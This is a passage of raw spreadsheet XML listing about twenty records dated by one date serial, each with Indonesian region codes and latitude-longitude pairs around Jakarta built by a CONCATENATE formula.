      <c r="L3319" t="s">
        <v>11069</v>
      </c>
      <c r="M3319">
        <v>3172050004</v>
      </c>
      <c r="N3319">
        <v>3172050</v>
      </c>
      <c r="O3319">
        <v>3172</v>
      </c>
      <c r="P3319">
        <v>31</v>
      </c>
      <c r="Q3319" t="s">
        <v>2717</v>
      </c>
      <c r="R3319" t="s">
        <v>358</v>
      </c>
      <c r="S3319" t="s">
        <v>49</v>
      </c>
      <c r="T3319" t="s">
        <v>33</v>
      </c>
      <c r="U3319" s="5">
        <v>10687603</v>
      </c>
      <c r="V3319" s="5" t="s">
        <v>17440</v>
      </c>
      <c r="W3319" s="5">
        <v>-629672</v>
      </c>
      <c r="X3319" t="s">
        <v>21174</v>
      </c>
      <c r="Y3319" t="str">
        <f t="shared" si="51"/>
        <v>-6.29672,106.87603</v>
      </c>
    </row>
    <row r="3320" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3320">
        <v>259871</v>
      </c>
      <c r="B3320" s="1">
        <v>44247</v>
      </c>
      <c r="C3320" s="2">
        <v>0.136875</v>
      </c>
      <c r="D3320" t="s">
        <v>22</v>
      </c>
      <c r="E3320" t="s">
        <v>23</v>
      </c>
      <c r="F3320" t="s">
        <v>11070</v>
      </c>
      <c r="G3320" t="s">
        <v>11071</v>
      </c>
      <c r="H3320" t="s">
        <v>26</v>
      </c>
      <c r="I3320" t="s">
        <v>1055</v>
      </c>
      <c r="J3320" t="s">
        <v>1158</v>
      </c>
      <c r="L3320" t="s">
        <v>11072</v>
      </c>
      <c r="M3320">
        <v>3174010002</v>
      </c>
      <c r="N3320">
        <v>3174010</v>
      </c>
      <c r="O3320">
        <v>3174</v>
      </c>
      <c r="P3320">
        <v>31</v>
      </c>
      <c r="Q3320" t="s">
        <v>514</v>
      </c>
      <c r="R3320" t="s">
        <v>69</v>
      </c>
      <c r="S3320" t="s">
        <v>32</v>
      </c>
      <c r="T3320" t="s">
        <v>33</v>
      </c>
      <c r="U3320" s="5">
        <v>10676306</v>
      </c>
      <c r="V3320" s="5" t="s">
        <v>17441</v>
      </c>
      <c r="W3320" s="5">
        <v>-619951</v>
      </c>
      <c r="X3320" t="s">
        <v>21175</v>
      </c>
      <c r="Y3320" t="str">
        <f t="shared" si="51"/>
        <v>-6.19951,106.76306</v>
      </c>
    </row>
    <row r="3321" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3321">
        <v>259899</v>
      </c>
      <c r="B3321" s="1">
        <v>44247</v>
      </c>
      <c r="C3321" s="2">
        <v>0.14106481481481481</v>
      </c>
      <c r="D3321" t="s">
        <v>22</v>
      </c>
      <c r="E3321" t="s">
        <v>23</v>
      </c>
      <c r="F3321" t="s">
        <v>11073</v>
      </c>
      <c r="G3321" t="s">
        <v>11074</v>
      </c>
      <c r="H3321" t="s">
        <v>26</v>
      </c>
      <c r="I3321" t="s">
        <v>443</v>
      </c>
      <c r="J3321" t="s">
        <v>2608</v>
      </c>
      <c r="L3321" t="s">
        <v>11075</v>
      </c>
      <c r="M3321">
        <v>3326070002</v>
      </c>
      <c r="N3321">
        <v>3326070</v>
      </c>
      <c r="O3321">
        <v>3326</v>
      </c>
      <c r="P3321">
        <v>33</v>
      </c>
      <c r="Q3321" t="s">
        <v>11076</v>
      </c>
      <c r="R3321" t="s">
        <v>2056</v>
      </c>
      <c r="S3321" t="s">
        <v>6246</v>
      </c>
      <c r="T3321" t="s">
        <v>1134</v>
      </c>
      <c r="U3321" s="5">
        <v>10961973</v>
      </c>
      <c r="V3321" s="5" t="s">
        <v>17442</v>
      </c>
      <c r="W3321" s="5">
        <v>-704222</v>
      </c>
      <c r="X3321" t="s">
        <v>21176</v>
      </c>
      <c r="Y3321" t="str">
        <f t="shared" si="51"/>
        <v>-7.04222,109.61973</v>
      </c>
    </row>
    <row r="3322" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3322">
        <v>259900</v>
      </c>
      <c r="B3322" s="1">
        <v>44247</v>
      </c>
      <c r="C3322" s="2">
        <v>0.14167824074074073</v>
      </c>
      <c r="D3322" t="s">
        <v>22</v>
      </c>
      <c r="E3322" t="s">
        <v>23</v>
      </c>
      <c r="F3322" t="s">
        <v>11077</v>
      </c>
      <c r="G3322" t="s">
        <v>11078</v>
      </c>
      <c r="H3322" t="s">
        <v>26</v>
      </c>
      <c r="I3322" t="s">
        <v>1009</v>
      </c>
      <c r="J3322" t="s">
        <v>11079</v>
      </c>
      <c r="L3322" t="s">
        <v>11080</v>
      </c>
      <c r="M3322">
        <v>3171060001</v>
      </c>
      <c r="N3322">
        <v>3171060</v>
      </c>
      <c r="O3322">
        <v>3171</v>
      </c>
      <c r="P3322">
        <v>31</v>
      </c>
      <c r="Q3322" t="s">
        <v>2211</v>
      </c>
      <c r="R3322" t="s">
        <v>1236</v>
      </c>
      <c r="S3322" t="s">
        <v>108</v>
      </c>
      <c r="T3322" t="s">
        <v>33</v>
      </c>
      <c r="U3322" s="5">
        <v>10679079</v>
      </c>
      <c r="V3322" s="5" t="s">
        <v>17443</v>
      </c>
      <c r="W3322" s="5">
        <v>-626057</v>
      </c>
      <c r="X3322" t="s">
        <v>21177</v>
      </c>
      <c r="Y3322" t="str">
        <f t="shared" si="51"/>
        <v>-6.26057,106.79079</v>
      </c>
    </row>
    <row r="3323" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3323">
        <v>259901</v>
      </c>
      <c r="B3323" s="1">
        <v>44247</v>
      </c>
      <c r="C3323" s="2">
        <v>0.14203703703703704</v>
      </c>
      <c r="D3323" t="s">
        <v>22</v>
      </c>
      <c r="E3323" t="s">
        <v>23</v>
      </c>
      <c r="F3323" t="s">
        <v>11081</v>
      </c>
      <c r="G3323" t="s">
        <v>11082</v>
      </c>
      <c r="H3323" t="s">
        <v>26</v>
      </c>
      <c r="I3323" t="s">
        <v>1055</v>
      </c>
      <c r="J3323" t="s">
        <v>3135</v>
      </c>
      <c r="L3323" t="s">
        <v>11083</v>
      </c>
      <c r="M3323">
        <v>3671012001</v>
      </c>
      <c r="N3323">
        <v>3671012</v>
      </c>
      <c r="O3323">
        <v>3671</v>
      </c>
      <c r="P3323">
        <v>36</v>
      </c>
      <c r="Q3323" t="s">
        <v>759</v>
      </c>
      <c r="R3323" t="s">
        <v>760</v>
      </c>
      <c r="S3323" t="s">
        <v>201</v>
      </c>
      <c r="T3323" t="s">
        <v>171</v>
      </c>
      <c r="U3323" s="5">
        <v>10669777</v>
      </c>
      <c r="V3323" s="5" t="s">
        <v>17444</v>
      </c>
      <c r="W3323" s="5">
        <v>-621380</v>
      </c>
      <c r="X3323" t="s">
        <v>21178</v>
      </c>
      <c r="Y3323" t="str">
        <f t="shared" si="51"/>
        <v>-6.21380,106.69777</v>
      </c>
    </row>
    <row r="3324" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3324">
        <v>259902</v>
      </c>
      <c r="B3324" s="1">
        <v>44247</v>
      </c>
      <c r="C3324" s="2">
        <v>0.14305555555555557</v>
      </c>
      <c r="D3324" t="s">
        <v>22</v>
      </c>
      <c r="E3324" t="s">
        <v>23</v>
      </c>
      <c r="F3324" t="s">
        <v>11084</v>
      </c>
      <c r="G3324" t="s">
        <v>11085</v>
      </c>
      <c r="H3324" t="s">
        <v>26</v>
      </c>
      <c r="I3324" t="s">
        <v>11086</v>
      </c>
      <c r="J3324" t="s">
        <v>5831</v>
      </c>
      <c r="L3324" t="s">
        <v>11087</v>
      </c>
      <c r="M3324">
        <v>3171070001</v>
      </c>
      <c r="N3324">
        <v>3171070</v>
      </c>
      <c r="O3324">
        <v>3171</v>
      </c>
      <c r="P3324">
        <v>31</v>
      </c>
      <c r="Q3324" t="s">
        <v>120</v>
      </c>
      <c r="R3324" t="s">
        <v>121</v>
      </c>
      <c r="S3324" t="s">
        <v>108</v>
      </c>
      <c r="T3324" t="s">
        <v>33</v>
      </c>
      <c r="U3324" s="5">
        <v>10681585</v>
      </c>
      <c r="V3324" s="5" t="s">
        <v>17318</v>
      </c>
      <c r="W3324" s="5">
        <v>-626506</v>
      </c>
      <c r="X3324" t="s">
        <v>21179</v>
      </c>
      <c r="Y3324" t="str">
        <f t="shared" si="51"/>
        <v>-6.26506,106.81585</v>
      </c>
    </row>
    <row r="3325" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3325">
        <v>259930</v>
      </c>
      <c r="B3325" s="1">
        <v>44247</v>
      </c>
      <c r="C3325" s="2">
        <v>0.14395833333333333</v>
      </c>
      <c r="D3325" t="s">
        <v>22</v>
      </c>
      <c r="E3325" t="s">
        <v>23</v>
      </c>
      <c r="F3325" t="s">
        <v>11088</v>
      </c>
      <c r="G3325" t="s">
        <v>11089</v>
      </c>
      <c r="H3325" t="s">
        <v>26</v>
      </c>
      <c r="I3325" t="s">
        <v>11090</v>
      </c>
      <c r="J3325" t="s">
        <v>2777</v>
      </c>
      <c r="L3325" t="s">
        <v>11091</v>
      </c>
      <c r="M3325">
        <v>3171070002</v>
      </c>
      <c r="N3325">
        <v>3171070</v>
      </c>
      <c r="O3325">
        <v>3171</v>
      </c>
      <c r="P3325">
        <v>31</v>
      </c>
      <c r="Q3325" t="s">
        <v>2142</v>
      </c>
      <c r="R3325" t="s">
        <v>121</v>
      </c>
      <c r="S3325" t="s">
        <v>108</v>
      </c>
      <c r="T3325" t="s">
        <v>33</v>
      </c>
      <c r="U3325" s="5">
        <v>10682179</v>
      </c>
      <c r="V3325" s="5" t="s">
        <v>17445</v>
      </c>
      <c r="W3325" s="5">
        <v>-624680</v>
      </c>
      <c r="X3325" t="s">
        <v>21180</v>
      </c>
      <c r="Y3325" t="str">
        <f t="shared" si="51"/>
        <v>-6.24680,106.82179</v>
      </c>
    </row>
    <row r="3326" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3326">
        <v>259931</v>
      </c>
      <c r="B3326" s="1">
        <v>44247</v>
      </c>
      <c r="C3326" s="2">
        <v>0.14613425925925927</v>
      </c>
      <c r="D3326" t="s">
        <v>22</v>
      </c>
      <c r="E3326" t="s">
        <v>23</v>
      </c>
      <c r="F3326" t="s">
        <v>11092</v>
      </c>
      <c r="G3326" t="s">
        <v>11093</v>
      </c>
      <c r="H3326" t="s">
        <v>26</v>
      </c>
      <c r="I3326" t="s">
        <v>4436</v>
      </c>
      <c r="J3326" t="s">
        <v>2627</v>
      </c>
      <c r="M3326">
        <v>3275060003</v>
      </c>
      <c r="N3326">
        <v>3275060</v>
      </c>
      <c r="O3326">
        <v>3275</v>
      </c>
      <c r="P3326">
        <v>32</v>
      </c>
      <c r="Q3326" t="s">
        <v>146</v>
      </c>
      <c r="R3326" t="s">
        <v>114</v>
      </c>
      <c r="S3326" t="s">
        <v>41</v>
      </c>
      <c r="T3326" t="s">
        <v>42</v>
      </c>
      <c r="U3326" s="5">
        <v>10696976</v>
      </c>
      <c r="V3326" s="5" t="s">
        <v>17446</v>
      </c>
      <c r="W3326" s="5">
        <v>-622305</v>
      </c>
      <c r="X3326" t="s">
        <v>18897</v>
      </c>
      <c r="Y3326" t="str">
        <f t="shared" si="51"/>
        <v>-6.22305,106.96976</v>
      </c>
    </row>
    <row r="3327" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3327">
        <v>259959</v>
      </c>
      <c r="B3327" s="1">
        <v>44247</v>
      </c>
      <c r="C3327" s="2">
        <v>0.14883101851851852</v>
      </c>
      <c r="D3327" t="s">
        <v>22</v>
      </c>
      <c r="E3327" t="s">
        <v>23</v>
      </c>
      <c r="F3327" t="s">
        <v>11094</v>
      </c>
      <c r="G3327" t="s">
        <v>11095</v>
      </c>
      <c r="H3327" t="s">
        <v>26</v>
      </c>
      <c r="I3327" t="s">
        <v>628</v>
      </c>
      <c r="J3327" t="s">
        <v>3300</v>
      </c>
      <c r="M3327">
        <v>3171020005</v>
      </c>
      <c r="N3327">
        <v>3171020</v>
      </c>
      <c r="O3327">
        <v>3171</v>
      </c>
      <c r="P3327">
        <v>31</v>
      </c>
      <c r="Q3327" t="s">
        <v>483</v>
      </c>
      <c r="R3327" t="s">
        <v>484</v>
      </c>
      <c r="S3327" t="s">
        <v>108</v>
      </c>
      <c r="T3327" t="s">
        <v>33</v>
      </c>
      <c r="U3327" s="5">
        <v>10683591</v>
      </c>
      <c r="V3327" s="5" t="s">
        <v>15619</v>
      </c>
      <c r="W3327" s="5">
        <v>-628735</v>
      </c>
      <c r="X3327" t="s">
        <v>21181</v>
      </c>
      <c r="Y3327" t="str">
        <f t="shared" si="51"/>
        <v>-6.28735,106.83591</v>
      </c>
    </row>
    <row r="3328" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3328">
        <v>259960</v>
      </c>
      <c r="B3328" s="1">
        <v>44247</v>
      </c>
      <c r="C3328" s="2">
        <v>0.14924768518518519</v>
      </c>
      <c r="D3328" t="s">
        <v>22</v>
      </c>
      <c r="E3328" t="s">
        <v>23</v>
      </c>
      <c r="F3328" t="s">
        <v>11096</v>
      </c>
      <c r="G3328" t="s">
        <v>11097</v>
      </c>
      <c r="H3328" t="s">
        <v>26</v>
      </c>
      <c r="I3328" t="s">
        <v>11098</v>
      </c>
      <c r="J3328" t="s">
        <v>5293</v>
      </c>
      <c r="L3328" t="s">
        <v>11099</v>
      </c>
      <c r="M3328">
        <v>3171030005</v>
      </c>
      <c r="N3328">
        <v>3171030</v>
      </c>
      <c r="O3328">
        <v>3171</v>
      </c>
      <c r="P3328">
        <v>31</v>
      </c>
      <c r="Q3328" t="s">
        <v>5900</v>
      </c>
      <c r="R3328" t="s">
        <v>364</v>
      </c>
      <c r="S3328" t="s">
        <v>108</v>
      </c>
      <c r="T3328" t="s">
        <v>33</v>
      </c>
      <c r="U3328" s="5">
        <v>10681277</v>
      </c>
      <c r="V3328" s="5" t="s">
        <v>17447</v>
      </c>
      <c r="W3328" s="5">
        <v>-627635</v>
      </c>
      <c r="X3328" t="s">
        <v>21182</v>
      </c>
      <c r="Y3328" t="str">
        <f t="shared" si="51"/>
        <v>-6.27635,106.81277</v>
      </c>
    </row>
    <row r="3329" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3329">
        <v>260022</v>
      </c>
      <c r="B3329" s="1">
        <v>44247</v>
      </c>
      <c r="C3329" s="2">
        <v>0.15712962962962962</v>
      </c>
      <c r="D3329" t="s">
        <v>22</v>
      </c>
      <c r="E3329" t="s">
        <v>23</v>
      </c>
      <c r="F3329" t="s">
        <v>11100</v>
      </c>
      <c r="G3329" t="s">
        <v>11101</v>
      </c>
      <c r="H3329" t="s">
        <v>26</v>
      </c>
      <c r="I3329" t="s">
        <v>11102</v>
      </c>
      <c r="J3329" t="s">
        <v>11103</v>
      </c>
      <c r="L3329" t="s">
        <v>11104</v>
      </c>
      <c r="M3329">
        <v>3171080005</v>
      </c>
      <c r="N3329">
        <v>3171080</v>
      </c>
      <c r="O3329">
        <v>3171</v>
      </c>
      <c r="P3329">
        <v>31</v>
      </c>
      <c r="Q3329" t="s">
        <v>11105</v>
      </c>
      <c r="R3329" t="s">
        <v>1403</v>
      </c>
      <c r="S3329" t="s">
        <v>108</v>
      </c>
      <c r="T3329" t="s">
        <v>33</v>
      </c>
      <c r="U3329" s="5">
        <v>10686206</v>
      </c>
      <c r="V3329" s="5" t="s">
        <v>17448</v>
      </c>
      <c r="W3329" s="5">
        <v>-625045</v>
      </c>
      <c r="X3329" t="s">
        <v>21183</v>
      </c>
      <c r="Y3329" t="str">
        <f t="shared" si="51"/>
        <v>-6.25045,106.86206</v>
      </c>
    </row>
    <row r="3330" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3330">
        <v>260104</v>
      </c>
      <c r="B3330" s="1">
        <v>44247</v>
      </c>
      <c r="C3330" s="2">
        <v>0.16435185185185186</v>
      </c>
      <c r="D3330" t="s">
        <v>22</v>
      </c>
      <c r="E3330" t="s">
        <v>23</v>
      </c>
      <c r="F3330" t="s">
        <v>11106</v>
      </c>
      <c r="G3330" t="s">
        <v>11107</v>
      </c>
      <c r="H3330" t="s">
        <v>26</v>
      </c>
      <c r="I3330" t="s">
        <v>3211</v>
      </c>
      <c r="J3330" t="s">
        <v>10669</v>
      </c>
      <c r="L3330" t="s">
        <v>11108</v>
      </c>
      <c r="M3330">
        <v>3171020005</v>
      </c>
      <c r="N3330">
        <v>3171020</v>
      </c>
      <c r="O3330">
        <v>3171</v>
      </c>
      <c r="P3330">
        <v>31</v>
      </c>
      <c r="Q3330" t="s">
        <v>483</v>
      </c>
      <c r="R3330" t="s">
        <v>484</v>
      </c>
      <c r="S3330" t="s">
        <v>108</v>
      </c>
      <c r="T3330" t="s">
        <v>33</v>
      </c>
      <c r="U3330" s="5">
        <v>10683391</v>
      </c>
      <c r="V3330" s="5" t="s">
        <v>17449</v>
      </c>
      <c r="W3330" s="5">
        <v>-628222</v>
      </c>
      <c r="X3330" t="s">
        <v>21184</v>
      </c>
      <c r="Y3330" t="str">
        <f t="shared" si="51"/>
        <v>-6.28222,106.83391</v>
      </c>
    </row>
    <row r="3331" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3331">
        <v>260132</v>
      </c>
      <c r="B3331" s="1">
        <v>44247</v>
      </c>
      <c r="C3331" s="2">
        <v>0.16824074074074072</v>
      </c>
      <c r="D3331" t="s">
        <v>22</v>
      </c>
      <c r="E3331" t="s">
        <v>23</v>
      </c>
      <c r="F3331" t="s">
        <v>11109</v>
      </c>
      <c r="G3331" t="s">
        <v>11110</v>
      </c>
      <c r="H3331" t="s">
        <v>26</v>
      </c>
      <c r="I3331" t="s">
        <v>1447</v>
      </c>
      <c r="J3331" t="s">
        <v>2627</v>
      </c>
      <c r="L3331" t="s">
        <v>11111</v>
      </c>
      <c r="M3331">
        <v>3275031002</v>
      </c>
      <c r="N3331">
        <v>3275031</v>
      </c>
      <c r="O3331">
        <v>3275</v>
      </c>
      <c r="P3331">
        <v>32</v>
      </c>
      <c r="Q3331" t="s">
        <v>573</v>
      </c>
      <c r="R3331" t="s">
        <v>574</v>
      </c>
      <c r="S3331" t="s">
        <v>41</v>
      </c>
      <c r="T3331" t="s">
        <v>42</v>
      </c>
      <c r="U3331" s="5">
        <v>10702597</v>
      </c>
      <c r="V3331" s="5" t="s">
        <v>17450</v>
      </c>
      <c r="W3331" s="5">
        <v>-630859</v>
      </c>
      <c r="X3331" t="s">
        <v>21185</v>
      </c>
      <c r="Y3331" t="str">
        <f t="shared" ref="Y3331:Y3394" si="52">CONCATENATE(X3331,",",V3331)</f>
        <v>-6.30859,107.02597</v>
      </c>
    </row>
    <row r="3332" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3332">
        <v>260133</v>
      </c>
      <c r="B3332" s="1">
        <v>44247</v>
      </c>
      <c r="C3332" s="2">
        <v>0.16854166666666667</v>
      </c>
      <c r="D3332" t="s">
        <v>22</v>
      </c>
      <c r="E3332" t="s">
        <v>23</v>
      </c>
      <c r="F3332" t="s">
        <v>11112</v>
      </c>
      <c r="H3332" t="s">
        <v>26</v>
      </c>
      <c r="I3332" t="s">
        <v>666</v>
      </c>
      <c r="J3332" t="s">
        <v>3686</v>
      </c>
      <c r="L3332" t="s">
        <v>11113</v>
      </c>
      <c r="M3332">
        <v>3172040002</v>
      </c>
      <c r="N3332">
        <v>3172040</v>
      </c>
      <c r="O3332">
        <v>3172</v>
      </c>
      <c r="P3332">
        <v>31</v>
      </c>
      <c r="Q3332" t="s">
        <v>281</v>
      </c>
      <c r="R3332" t="s">
        <v>281</v>
      </c>
      <c r="S3332" t="s">
        <v>49</v>
      </c>
      <c r="T3332" t="s">
        <v>33</v>
      </c>
      <c r="U3332" s="5">
        <v>10687758</v>
      </c>
      <c r="V3332" s="5" t="s">
        <v>17451</v>
      </c>
      <c r="W3332" s="5">
        <v>-627697</v>
      </c>
      <c r="X3332" t="s">
        <v>21186</v>
      </c>
      <c r="Y3332" t="str">
        <f t="shared" si="52"/>
        <v>-6.27697,106.87758</v>
      </c>
    </row>
    <row r="3333" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3333">
        <v>260134</v>
      </c>
      <c r="B3333" s="1">
        <v>44247</v>
      </c>
      <c r="C3333" s="2">
        <v>0.16887731481481483</v>
      </c>
      <c r="D3333" t="s">
        <v>22</v>
      </c>
      <c r="E3333" t="s">
        <v>23</v>
      </c>
      <c r="F3333" t="s">
        <v>11114</v>
      </c>
      <c r="G3333" t="s">
        <v>11115</v>
      </c>
      <c r="H3333" t="s">
        <v>26</v>
      </c>
      <c r="I3333" t="s">
        <v>2962</v>
      </c>
      <c r="J3333" t="s">
        <v>2627</v>
      </c>
      <c r="L3333" t="s">
        <v>11116</v>
      </c>
      <c r="M3333">
        <v>3275020001</v>
      </c>
      <c r="N3333">
        <v>3275020</v>
      </c>
      <c r="O3333">
        <v>3275</v>
      </c>
      <c r="P3333">
        <v>32</v>
      </c>
      <c r="Q3333" t="s">
        <v>5124</v>
      </c>
      <c r="R3333" t="s">
        <v>828</v>
      </c>
      <c r="S3333" t="s">
        <v>41</v>
      </c>
      <c r="T3333" t="s">
        <v>42</v>
      </c>
      <c r="U3333" s="5">
        <v>10694818</v>
      </c>
      <c r="V3333" s="5" t="s">
        <v>17452</v>
      </c>
      <c r="W3333" s="5">
        <v>-633726</v>
      </c>
      <c r="X3333" t="s">
        <v>21187</v>
      </c>
      <c r="Y3333" t="str">
        <f t="shared" si="52"/>
        <v>-6.33726,106.94818</v>
      </c>
    </row>
    <row r="3334" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3334">
        <v>260135</v>
      </c>
      <c r="B3334" s="1">
        <v>44247</v>
      </c>
      <c r="C3334" s="2">
        <v>0.16894675925925925</v>
      </c>
      <c r="D3334" t="s">
        <v>22</v>
      </c>
      <c r="E3334" t="s">
        <v>23</v>
      </c>
      <c r="F3334" t="s">
        <v>11117</v>
      </c>
      <c r="H3334" t="s">
        <v>26</v>
      </c>
      <c r="I3334" t="s">
        <v>457</v>
      </c>
      <c r="J3334" t="s">
        <v>2627</v>
      </c>
      <c r="L3334" t="s">
        <v>11118</v>
      </c>
      <c r="M3334">
        <v>3276030011</v>
      </c>
      <c r="N3334">
        <v>3276030</v>
      </c>
      <c r="O3334">
        <v>3276</v>
      </c>
      <c r="P3334">
        <v>32</v>
      </c>
      <c r="Q3334" t="s">
        <v>10939</v>
      </c>
      <c r="R3334" t="s">
        <v>184</v>
      </c>
      <c r="S3334" t="s">
        <v>185</v>
      </c>
      <c r="T3334" t="s">
        <v>42</v>
      </c>
      <c r="U3334" s="5">
        <v>10685875</v>
      </c>
      <c r="V3334" s="5" t="s">
        <v>17453</v>
      </c>
      <c r="W3334" s="5">
        <v>-637305</v>
      </c>
      <c r="X3334" t="s">
        <v>21188</v>
      </c>
      <c r="Y3334" t="str">
        <f t="shared" si="52"/>
        <v>-6.37305,106.85875</v>
      </c>
    </row>
    <row r="3335" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3335">
        <v>260136</v>
      </c>
      <c r="B3335" s="1">
        <v>44247</v>
      </c>
      <c r="C3335" s="2">
        <v>0.16921296296296295</v>
      </c>
      <c r="D3335" t="s">
        <v>22</v>
      </c>
      <c r="E3335" t="s">
        <v>23</v>
      </c>
      <c r="F3335" t="s">
        <v>11119</v>
      </c>
      <c r="G3335" t="s">
        <v>11120</v>
      </c>
      <c r="H3335" t="s">
        <v>26</v>
      </c>
      <c r="I3335" t="s">
        <v>4723</v>
      </c>
      <c r="J3335" t="s">
        <v>2485</v>
      </c>
      <c r="L3335" t="s">
        <v>11121</v>
      </c>
      <c r="M3335">
        <v>3171080001</v>
      </c>
      <c r="N3335">
        <v>3171080</v>
      </c>
      <c r="O3335">
        <v>3171</v>
      </c>
      <c r="P3335">
        <v>31</v>
      </c>
      <c r="Q3335" t="s">
        <v>2265</v>
      </c>
      <c r="R3335" t="s">
        <v>1403</v>
      </c>
      <c r="S3335" t="s">
        <v>108</v>
      </c>
      <c r="T3335" t="s">
        <v>33</v>
      </c>
      <c r="U3335" s="5">
        <v>10682965</v>
      </c>
      <c r="V3335" s="5" t="s">
        <v>17454</v>
      </c>
      <c r="W3335" s="5">
        <v>-627088</v>
      </c>
      <c r="X3335" t="s">
        <v>21189</v>
      </c>
      <c r="Y3335" t="str">
        <f t="shared" si="52"/>
        <v>-6.27088,106.82965</v>
      </c>
    </row>
    <row r="3336" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3336">
        <v>260164</v>
      </c>
      <c r="B3336" s="1">
        <v>44247</v>
      </c>
      <c r="C3336" s="2">
        <v>0.17134259259259257</v>
      </c>
      <c r="D3336" t="s">
        <v>22</v>
      </c>
      <c r="E3336" t="s">
        <v>23</v>
      </c>
      <c r="F3336" t="s">
        <v>11122</v>
      </c>
      <c r="G3336" t="s">
        <v>11123</v>
      </c>
      <c r="H3336" t="s">
        <v>26</v>
      </c>
      <c r="I3336" t="s">
        <v>666</v>
      </c>
      <c r="J3336" t="s">
        <v>3686</v>
      </c>
      <c r="L3336" t="s">
        <v>11124</v>
      </c>
      <c r="M3336">
        <v>3172040002</v>
      </c>
      <c r="N3336">
        <v>3172040</v>
      </c>
      <c r="O3336">
        <v>3172</v>
      </c>
      <c r="P3336">
        <v>31</v>
      </c>
      <c r="Q3336" t="s">
        <v>281</v>
      </c>
      <c r="R3336" t="s">
        <v>281</v>
      </c>
      <c r="S3336" t="s">
        <v>49</v>
      </c>
      <c r="T3336" t="s">
        <v>33</v>
      </c>
      <c r="U3336" s="5">
        <v>10687782</v>
      </c>
      <c r="V3336" s="5" t="s">
        <v>17455</v>
      </c>
      <c r="W3336" s="5">
        <v>-627653</v>
      </c>
      <c r="X3336" t="s">
        <v>21190</v>
      </c>
      <c r="Y3336" t="str">
        <f t="shared" si="52"/>
        <v>-6.27653,106.87782</v>
      </c>
    </row>
    <row r="3337" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3337">
        <v>260165</v>
      </c>
      <c r="B3337" s="1">
        <v>44247</v>
      </c>
      <c r="C3337" s="2">
        <v>0.17479166666666668</v>
      </c>
      <c r="D3337" t="s">
        <v>22</v>
      </c>
      <c r="E3337" t="s">
        <v>23</v>
      </c>
      <c r="F3337" t="s">
        <v>11125</v>
      </c>
      <c r="G3337" t="s">
        <v>11126</v>
      </c>
      <c r="H3337" t="s">
        <v>26</v>
      </c>
      <c r="I3337" t="s">
        <v>2300</v>
      </c>
      <c r="J3337" t="s">
        <v>4658</v>
      </c>
      <c r="L3337" t="s">
        <v>11127</v>
      </c>
      <c r="M3337">
        <v>3172030005</v>
      </c>
      <c r="N3337">
        <v>3172030</v>
      </c>
      <c r="O3337">
        <v>3172</v>
      </c>
      <c r="P3337">
        <v>31</v>
      </c>
      <c r="Q3337" t="s">
        <v>1256</v>
      </c>
      <c r="R3337" t="s">
        <v>228</v>
      </c>
      <c r="S3337" t="s">
        <v>49</v>
      </c>
      <c r="T3337" t="s">
        <v>33</v>
      </c>
      <c r="U3337" s="5">
        <v>10691476</v>
      </c>
      <c r="V3337" s="5" t="s">
        <v>17456</v>
      </c>
      <c r="W3337" s="5">
        <v>-631684</v>
      </c>
      <c r="X3337" t="s">
        <v>21191</v>
      </c>
      <c r="Y3337" t="str">
        <f t="shared" si="52"/>
        <v>-6.31684,106.91476</v>
      </c>
    </row>
    <row r="3338" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3338">
        <v>260166</v>
      </c>
      <c r="B3338" s="1">
        <v>44247</v>
      </c>
      <c r="C3338" s="2">
        <v>0.17534722222222221</v>
      </c>
      <c r="D3338" t="s">
        <v>22</v>
      </c>
      <c r="E3338" t="s">
        <v>23</v>
      </c>
      <c r="F3338" t="s">
        <v>11128</v>
      </c>
      <c r="H3338" t="s">
        <v>26</v>
      </c>
      <c r="I3338" t="s">
        <v>3690</v>
      </c>
      <c r="J3338" t="s">
        <v>5608</v>
      </c>
      <c r="L3338" t="s">
        <v>11129</v>
      </c>
      <c r="M3338">
        <v>3172030002</v>
      </c>
      <c r="N3338">
        <v>3172030</v>
      </c>
      <c r="O3338">
        <v>3172</v>
      </c>
      <c r="P3338">
        <v>31</v>
      </c>
      <c r="Q3338" t="s">
        <v>1534</v>
      </c>
      <c r="R3338" t="s">
        <v>228</v>
      </c>
      <c r="S3338" t="s">
        <v>49</v>
      </c>
      <c r="T3338" t="s">
        <v>33</v>
      </c>
      <c r="U3338" s="5">
        <v>10690200</v>
      </c>
      <c r="V3338" s="5" t="s">
        <v>17457</v>
      </c>
      <c r="W3338" s="5">
        <v>-633112</v>
      </c>
      <c r="X3338" t="s">
        <v>21192</v>
      </c>
      <c r="Y3338" t="str">
        <f t="shared" si="52"/>
        <v>-6.33112,106.90200</v>
      </c>
    </row>
    <row r="3339" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3339">
        <v>260167</v>
      </c>
      <c r="B3339" s="1">
        <v>44247</v>
      </c>
      <c r="C3339" s="2">
        <v>0.17579861111111109</v>
      </c>
      <c r="D3339" t="s">
        <v>22</v>
      </c>
      <c r="E3339" t="s">
        <v>23</v>
      </c>
      <c r="F3339" t="s">
        <v>11130</v>
      </c>
      <c r="H3339" t="s">
        <v>26</v>
      </c>
      <c r="I3339" t="s">
        <v>386</v>
      </c>
      <c r="J3339" t="s">
        <v>3135</v>
      </c>
      <c r="L3339" t="s">
        <v>11131</v>
      </c>
      <c r="M3339">
        <v>3671010001</v>
      </c>
      <c r="N3339">
        <v>3671010</v>
      </c>
      <c r="O3339">
        <v>3671</v>
      </c>
      <c r="P3339">
        <v>36</v>
      </c>
      <c r="Q3339" t="s">
        <v>4656</v>
      </c>
      <c r="R3339" t="s">
        <v>200</v>
      </c>
      <c r="S3339" t="s">
        <v>201</v>
      </c>
      <c r="T3339" t="s">
        <v>171</v>
      </c>
